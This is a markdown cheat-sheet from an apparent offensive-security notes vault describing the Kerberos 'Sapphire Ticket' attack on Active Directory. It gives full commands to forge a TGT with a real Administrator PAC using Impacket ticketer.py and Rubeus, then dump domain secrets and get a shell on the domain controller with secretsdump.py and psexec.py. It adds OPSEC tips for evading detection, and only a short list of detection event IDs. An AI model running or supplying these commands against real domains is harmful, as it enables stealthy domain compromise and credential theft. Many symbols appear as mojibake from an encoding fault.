attack-14-sapphire-ticket-attack.md (7336B)
1 --- 2 title: "Attack #14 β Sapphire Ticket Attack" 3 description: "The Sapphire Ticket is the most OPSEC-friendly ticket forging technique in the Kerberos attack family. It addresses the final detection gap that Diamondβ¦" 4 category: active-directory 5 subcategory: "Kerberos & Delegation" 6 tags: ["active-directory", "kerberos", "credential-access", "privilege-escalation"] 7 tools: ["Impacket", "Mimikatz", "Rubeus", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Two/π Attack #14 β Sapphire Ticket Attack.md" 11 --- 12 # π Attack #14 β Sapphire Ticket Attack 13 14 *** 15 16 ## π How It Works 17 18 The Sapphire Ticket is **the most OPSEC-friendly ticket forging technique** in the Kerberos attack family. It addresses the final detection gap that Diamond Tickets still have β fabricated PAC data. While Diamond Tickets modify a legitimate TGT's PAC with attacker-chosen group memberships (which can be detected by comparing PAC claims against actual AD group memberships), the Sapphire Ticket obtains a **real, legitimate PAC** belonging to the target high-privileged user via the **S4U2Self + User-to-User (U2U)** protocol extensions, then grafts that authentic PAC into a forged TGT. 19 20 ### Ticket Evolution β From Golden to Sapphire 21 22 | Ticket Type | PAC Source | AS-REQ Present? | Detection Difficulty | 23 |---|---|---|---| 24 | **Golden** | Entirely fabricated | β No | Easy β missing AS-REQ + fake PAC | 25 | **Silver** | Entirely fabricated | N/A (TGS only) | Medium β no DC events, but PAC validation catches it | 26 | **Diamond** | Modified from real (but groups changed) | β Yes | Hard β has AS-REQ, but PAC groups mismatch AD | 27 | **Sapphire** | Real PAC obtained via S4U2Self+U2U | β Yes | Very Hard β everything is legitimate | 28 29 ### How It Works Step-by-Step 30 31 ``` 32 1. Obtain KRBTGT AES256 key (via DCSync) 33 2. Request a legitimate TGT for your controlled user (real AS-REQ) 34 3. Use S4U2Self + U2U to request a service ticket to yourself on behalf of 35 the target privileged user (e.g., Administrator) 36 4. This returns a REAL PAC belonging to Administrator β with genuine group 37 memberships signed by the DC 38 5. Extract the PAC from the S4U2Self response 39 6. Decrypt your TGT, replace YOUR PAC with Administrator's REAL PAC 40 7. Re-encrypt and re-sign the TGT 41 8. Result: Your TGT now carries Administrator's genuine PAC β undetectable 42 by PAC inspection because the PAC data is 100% real 43 ``` 44 45 *** 46 47 ## βοΈ Prerequisites 48 49 | Requirement | Detail | 50 |---|---| 51 | **KRBTGT AES256 key** | Required for TGT decryption and re-encryption | 52 | **Domain Admin or DCSync rights** | To extract the KRBTGT key | 53 | **Valid domain user account** | For the initial AS-REQ and S4U2Self request | 54 | **Target user must exist** | The S4U2Self request queries the DC for the real PAC | 55 56 *** 57 58 ## π οΈ Tools 59 60 | Tool | Platform | Notes | 61 |---|---|---| 62 | **Impacket β ticketer.py** | Linux | `-impersonate` flag performs Sapphire Ticket attack | 63 | **Rubeus** | Windows | Can be used for the S4U2Self+U2U flow manually | 64 | **Mimikatz** | Windows | DCSync for KRBTGT key extraction | 65 66 *** 67 68 ## π» Full Commands 69 70 ### π΄ Impacket β ticketer.py (Linux β Primary Method) 71 72 ```bash 73 # ββ Sapphire Ticket β forge TGT with real Administrator PAC βββββββββββββββββββ 74 ticketer.py -nthash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \ 75 -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \ 76 -domain corp.local \ 77 -impersonate Administrator \ 78 -dc-ip 10.10.10.10 \ 79 low_user 80 81 # Flags: 82 # -nthash = KRBTGT NT hash 83 # -impersonate = Target user whose REAL PAC to obtain via S4U2Self+U2U 84 # -dc-ip = DC to query for the S4U2Self request 85 # low_user = Your controlled user for the base TGT 86 87 # ββ Using AES key (preferred) βββββββββββββββββββββββββββββββββββββββββββββββββ 88 ticketer.py -aesKey b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 89 -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \ 90 -domain corp.local \ 91 -impersonate Administrator \ 92 -dc-ip 10.10.10.10 \ 93 low_user 94 95 # ββ Use the Sapphire Ticket βββββββββββββββββββββββββββββββββββββββββββββββββββ 96 export KRB5CCNAME=low_user.ccache 97 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local 98 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 99 ``` 100 101 ### π΄ Manual S4U2Self + U2U Flow (Rubeus β Windows) 102 103 ```powershell 104 # ββ Step 1: Request legitimate TGT ββββββββββββββββββββββββββββββββββββββββββββ 105 .\Rubeus.exe asktgt /user:low_user /password:Password1 /enctype:aes256 /nowrap /outfile:low_user.kirbi 106 107 # ββ Step 2: Use S4U2Self+U2U to get Administrator's PAC ββββββββββββββββββββββ 108 .\Rubeus.exe s4u /self /user:low_user /impersonateuser:Administrator /ticket:low_user.kirbi /nowrap 109 110 # ββ Step 3: Manual PAC extraction and TGT modification (requires custom tooling) 111 # The PAC from the S4U2Self response contains Administrator's real group memberships 112 # Graft this PAC into the original TGT using KRBTGT key 113 114 # Note: Rubeus does not have a single-command "sapphire" option like Diamond 115 # The Impacket ticketer.py with -impersonate is the cleanest approach 116 ``` 117 118 *** 119 120 ## π― OPSEC Tips 121 122 - **Sapphire Ticket is virtually undetectable** β the PAC is real (signed by the DC), the AS-REQ is real, and the TGT encryption is correct 123 - **The S4U2Self+U2U request IS logged** β Event 4769 shows a service ticket request, but this is normal protocol behavior and hard to distinguish from legitimate traffic 124 - **AES encryption is mandatory** for maximum stealth 125 - **Sapphire > Diamond > Golden** β always prefer Sapphire when possible for the most OPSEC-safe persistence 126 127 *** 128 129 ## π‘οΈ Detection β Event IDs 130 131 | Event ID | Source | What to Look For | 132 |---|---|---| 133 | **4768** | Security Log (DC) | TGT request β present (legitimate AS-REQ) | 134 | **4769** | Security Log (DC) | S4U2Self service ticket request β watch for U2U patterns from non-service accounts | 135 | **4624** | Security Log | Logon with elevated privileges from unexpected user/host | 136 137 **Primary detection challenge:** Sapphire Tickets are the hardest to detect because every component is legitimate β the AS-REQ, the PAC data, and the encryption. Detection must focus on **behavioral analysis** β why is a low-privilege user suddenly accessing DA-protected resources? The S4U2Self+U2U request pattern from a non-service account is the only technical indicator, but it's subtle. 138 139 *** 140 141 ## π Attack Chain Context 142 143 ``` 144 [Sapphire Ticket] βββ Most Stealthy Domain Persistence 145 β 146 ββββ π Real PAC + Real AS-REQ = virtually undetectable 147 ββββ π©Έ Use as DA β DCSync β complete domain compromise 148 ββββ π Only defeated by KRBTGT reset Γ 2 149 ββββ π Chain: DCSync β get KRBTGT key β Sapphire Ticket 150 ββββ π OPSEC ranking: Sapphire > Diamond > Golden 151 ``` 152 153 *** 154 155 > β **Attack #14 β Sapphire Ticket complete.**